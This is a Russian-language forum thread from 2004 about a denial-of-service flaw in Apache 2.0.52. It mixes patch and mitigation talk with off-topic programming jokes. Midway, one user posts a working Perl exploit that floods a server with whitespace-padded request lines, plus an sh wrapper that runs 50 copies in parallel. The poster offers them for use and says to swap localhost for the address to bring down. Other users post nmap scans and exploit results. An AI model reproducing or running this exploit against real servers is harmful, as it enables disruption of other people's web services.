Не зря злые языки утверждают, что слово apache пошло от a patch...

Фига себе... 8000^2 / 1024^2 ~= 61Мб

Ну и запрос 8-|

ыы, работает, патчимси

Где пропадает K48? Для тебя есть задание! Устраиваем голосование, кого на этот раз будем валить.

кстати, эта пакость еще и squid transparent повалила ...

вот скажите, на уровне файерволла можн остановить такие запросы или нет? Это ведь получается куча здоровых пакетов с пробелами внутри.

Эксплоит не работает. Проверял давно :)

работает... 2 сервака уронил а 2 стоят как и стояли. всё пучком. главное правильная настройка

не работает

Нифига не работает этот эксплойт,

nmap 192.168.0.8

Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2004-11-30 00:21 MSK
Interesting ports on pentagon (192.168.0.8):
(The 1655 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
8000/tcp open http-alt

Nmap run completed -- 1 IP address (1 host up) scanned in 0.381 seconds

потом делаю

./a.out 192.168.0.8
connect(): Connection refused

apache-2.0.52 worker_mpm, не работает.

пользуйтесь на здоровье

вот, написал на перле и sh, всё работает прекрасно - перезагружаться пришлось :)

-------------------------------------------------------hang-apache
#!/usr/bin/perl -w
#Apache Exploit (for all current versions) by Vadim Kataev aka VM #29.11.2004

use Socket;

$remote_host = "localhost";
$remote_port = 80;

$init = "GET / HTTP/1.0\n";
$buff = ' ';
for ($i=0;$i<8000;$i++){
$buff = $buff . ' ';
}
$buff = $buff . "\n";

socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$internet_addr=inet_aton($remote_host) or die "I cant find address: $!\n";
$paddr = sockaddr_in($remote_port, $internet_addr);
connect(TO_SERVER, $paddr) or die "I cant connect: $!\n";

print TO_SERVER $init or die "Error by sending : $!\n";
for ($i=0;$i<9999;$i++){
print TO_SERVER $buff or die "Error by sending : $!\n";
}

print "Done\n";
close ( TO_SERVER );
----------------------------------------------------------------
-------------------------------------------------hang-apache.run.sh
#!/bin/sh
#Apache Exploit (for all current verions) by Vadim Kataev aka VM #29.11.2004

i=0
iend=50
while [ "$i" -lt "$iend" ]
do
./hang-apache &
i=$(expr $i + 1 )
echo $i

done
------------------------------------------------------------------

всё что вам надо - заменить localhost на тот адрес, который надо повесить

И где же патч брать?
Если уязвим 2.0.52 а на httpd.apache.org ничего более свежего не предлагают пока?

Нифига, маздай с запущеным индейцем остался жив

в маздае и без апача дыр достаточно

кого лучше ставить вместо апача для статики+cgi с очень небольшой нагрузкой?

> Ну и запрос 8-|

Уф. Слава богу! Там, где стоит единтсвенный смотрящий в инет мой веб сервак - в общем через тот канал такой запрос за год не пролезет... ;-))))))

RH 9, apache 1.3.31 - не упал

Хех млин ... Поднял на десктопе Апач 2.0.52. Запустил эксплоит. Итог Xorg со всеми прибамбасами сдох, а индеец живее всех живых.

Apache 2.52 под Win32.
Не падает ...

Очень старая новость и эксплойт соответственно :) Уже почти месяц как эта новость публична

thttpd ?

apache-1.3.33 + mod_security + ядро системы 2.4.28-ow1 - даже не задумался, а эксплоит выдал:

connect(): connection refused.

в логах апача:

request failed: error reading the headers.

2.0.52 из fc3 не падает

На нормальных хостингах стоит апач 1.3.x
И так будет, похоже, до выхода апача версии 2.3.x

А как patch то называется? Что-то я не нашел ничего нового...

А эксплоит так конкретно сервачек пригрузил. Сервак хоть и не упал, но даже с консоли получить доступ было сложно... 8-(

А доки почитать про rlimitmem и rlimitcpu ? При правильной настройки ничего падать не должно!

Ну вашу машу...Че за крики то?...новость то того...с бородой. И фиксы все что нада есь давно. Что за крики в партере? Сплоит не работает? А вы внутрь заглядывали? Там ващето написано что не падает ничего изза него. Интересно конечно как вы его скомпилить умудрились. Лор рулит! =)

http://cr.yp.to/publicfile.html

дядя Бернштейн написал для статики http сервер :)

>дядя Бернштейн написал для статики http сервер :)
Для статики можно и на коленке написать (за вечер).

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0811

так же как и Бернштейн? всмысле без дыр??

>так же как и Бернштейн? всмысле без дыр??
А это смотря какой функцианал там реализовывать :)
Для статики что-то легкое можно и совсем без дыр написать :)

тока почему то пишут все с дырами да с дырами .... чего нельзя сказать про изделия (qmail djbdns publicfile) этого автора

а потом патчат патчат патчат

>тока почему то пишут все с дырами да с дырами .... чего нельзя сказать >про изделия (qmail djbdns publicfile) этого автора
А я про этого автора ничего и не говорил :)
Я говорил лишь то что писать без критических дыр может не только он :)

А с дырами пишут потому как:
1) людям свойственно ошибатся (постоянно)
2) некоторые не понимают первого пункта и потому безнадежны (например свято верят что проверять ответ malloc() не надо)

я согласен что писать без критических дыр может не только он :)

Как говорил один знакомый программер: - Написть программу, это я раз плюнуть... А вот чтоб она работала, тут я мягкий.

Странные у тебя знакомые :) Знаешь чем проф программеры от не не проф отличаются ?

Только лишь наличием корочек. А если в бане, то вообще не отличишь.

Двойка, корочки тут вообще не причем.

>Знаешь чем проф программеры от не не проф отличаются ?

Атож! Профи за программирование деньги получают, а непрофи пишут для души :)

Корочками головного мозга, а Вы о чём подумали? Не томи, колись, не все же здесь медиумы.

У профи души нет?

>Атож! Профи за программирование деньги получают, а непрофи пишут для >души :)
Ха-ха. Мало думаешь народу пишут за деньги для души ? Или мало левого народу за деньги пишут ?

Левая душа за деньги... Не, говорю у профи корочки все в бэдблоках, как у профи-боксёров.

Все просто: все мы люди и потому делаем ошибки и проф программеры и не проф программеры, а дальше начинаются различия. Не проф программеры либо не видят своих ошибок, либо у них опускаются руки их искать, а проф программеры УВЕРЕНЫ что они ТОЧНО найдут и ТОЧНО уничтожат свои баги.
Найдут и убъют. Вот и все :) А то, что у вас знакомый скис баги искать, говорит о его проф пригодности.

Есть древний тест для того, чтоб отличить профи от непрофи.

Задача: если на вход блока приходит 2, виходить должно 1. А если приходит 1, выходить должно 2.

Непрофи напишет примерно такое

if (a == 2) {
return 1;
} else if (a == 1) {
return 2;
} else {
throw new Exception();
}

А профи напишет

return 3-a;

:)

:) Хе-хе, а я бы сделал:

return 4 >> a;

При этом 0 означает ошибку - так что это даже более правильно :)
Хотя совсем правильно тогда будет:

return (4 >> a) & 3;

Вообщем ищите и убивайте баги, верьте в себя и пишите больше хорошего софта для GNU/Linux !!!

a xor 3 ;)

>При этом 0 означает ошибку - так что это даже более правильно :)

Про ноль в условии задачи ни чего не говорилось. Отсебятину в реалицации ТЗ обычно гонит хто?

:)))

Профи, непрофи...

Как говорится, не учите дедушку кашлить.

:)